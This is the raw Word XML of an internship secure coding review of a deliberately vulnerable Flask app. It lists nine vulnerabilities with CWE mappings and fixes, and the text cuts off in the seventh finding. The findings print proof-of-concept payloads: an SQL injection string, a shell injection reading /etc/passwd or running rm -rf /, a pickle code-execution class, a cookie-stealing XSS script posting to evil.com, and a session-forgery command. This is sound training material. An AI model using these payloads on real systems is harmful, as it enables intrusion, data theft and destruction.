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200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">🔐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURE CODING REVIEW REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeAlpha Cybersecurity Internship — Task 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application: vulnerable_app.py (Flask Web Application)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Language: Python 3  |  Framework: Flask  |  Date: June 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="720" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditor: CodeAlpha Intern  |  Classification: EDUCATIONAL / INTERNAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive static code review was performed on vulnerable_app.py, a Python Flask web application containing intentional security weaknesses introduced for training purposes. The audit identified nine (9) distinct vulnerabilities spanning five OWASP Top 10 categories. Three vulnerabilities are rated CRITICAL, four are HIGH, and two are MEDIUM severity. All findings have been remediated in secure_app.py and are documented in full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(3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="9B75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(2)</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SQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">OS Command Injection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Reflected XSS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded Secret Key</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Password Hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data in URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Debug Mode in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following file was audited using manual static analysis and tool-assisted inspection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File: vulnerable_app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Language: Python 3.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Framework: Flask 3.x with SQLite database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lines of Code: ~130</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual line-by-line code inspection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE (Common Weakness Enumeration) mapping for each finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 (2021) classification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof-of-concept payloads for each exploitable finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation implemented in secure_app.py</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Vulnerability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1200"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="146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Vulnerability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CWE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Line(s)</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SQL Injection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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-89</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47–49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 Command Injection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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-78</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97–99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Insecure Deserialization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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-502</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111–114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Reflected XSS</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555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-79</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Broken Access Control</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555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-284</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77–80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Hardcoded Secret Key</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555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-798</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Weak Password Hashing</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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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31–33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Sensitive Data in URL</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color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-598</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9B75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116–121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Debug Mode in Production</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i/>
                <w:iCs/>
                <w:color w:val="555555"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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9B75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 Fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-01 — SQL Injection</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C0392B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL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CWE-89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">47–49</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User-supplied username is directly concatenated into a raw SQL query string without sanitisation. This allows an attacker to manipulate the query logic, bypassing authentication or dumping the database.</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Complete authentication bypass, data exfiltration of all user records including password hashes.</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Username: ' OR '1'='1'-- (bypasses password check entirely)</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Use parameterised queries: cursor.execute("SELECT * FROM users WHERE username=?", (username,)). Never concatenate user input into SQL strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-02 — OS Command Injection</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C0392B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL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CWE-78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">97–99</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/ping endpoint passes user-supplied 'host' input directly to subprocess.check_output() with shell=True. This allows arbitrary shell command execution on the server.</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Full Remote Code Execution (RCE). Attacker gains OS-level access to the server.</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GET /ping?host=127.0.0.1;cat /etc/passwd (or; rm -rf / on Linux)</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Validate input against strict allowlist regex (^[a-zA-Z0-9.\-]+$), pass command as a list to subprocess.run(), and never use shell=True with user input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-03 — Insecure Deserialization</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C0392B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRITICAL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CWE-502</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">111–114</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/load endpoint accepts file uploads and deserialises them with pickle.loads(). Python's pickle module executes arbitrary code during deserialization.</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Remote Code Execution. A crafted pickle payload can execute any OS command with the server's privileges.</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Upload a pickle file containing: class E: def __reduce__(self): return (os.system, ('id',))</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Replace pickle with JSON (json.loads()). Never deserialize untrusted data with pickle, marshal, or yaml.load(). If serialization is needed, use JSON or protobuf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-04 — Reflected Cross-Site Scripting (XSS)</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E67E22" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH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CWE-79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">61</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login error message echoes the submitted username directly into the HTML response without encoding. An attacker can inject malicious JavaScript that executes in the victim's browser.</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Session hijacking, credential theft, phishing overlays, browser exploitation.</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Username: &lt;script&gt;document.location='https://evil.com?c='+document.cookie&lt;/script&gt;</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Use Jinja2 autoescape (enabled by default with render_template). Never use render_template_string with f-strings. Sanitise all reflected values with markupsafe.escape().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-05 — Broken Access Control</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E67E22" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH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CWE-284</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">77–80</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/admin route reads the user's role from the session cookie without verifying it against the database. Since Flask sessions are client-side (signed but not encrypted), a user who knows or guesses the secret key can forge an admin session.</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Unauthorised access to admin functionality. Privilege escalation from regular user to administrator.</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Decode Flask session, modify role to 'admin', re-sign with known/weak secret key.</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Always verify roles server-side by querying the database on each privileged request. Never trust client-supplied session data for authorization decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-06 — Hardcoded Secret Key</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E67E22" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH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CWE-798</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">22</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app.secret_key is set to a static, weak string ('supersecret123'). This key signs Flask session cookies. If it is discovered (e.g. via source code leak), all session tokens can be forged.</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Session forgery, authentication bypass for all users, privilege escalation.</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flask-unsign --sign --secret supersecret123 --cookie '{"role":"admin"}'</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Generate with secrets.token_hex(32) at startup. Load from environment variable (os.environ.get('SECRET_KEY')) — never commit secrets to version control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">V-07 — Weak Password Hashing (MD5)</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E67E22" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH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CWE-916</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    Lines: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
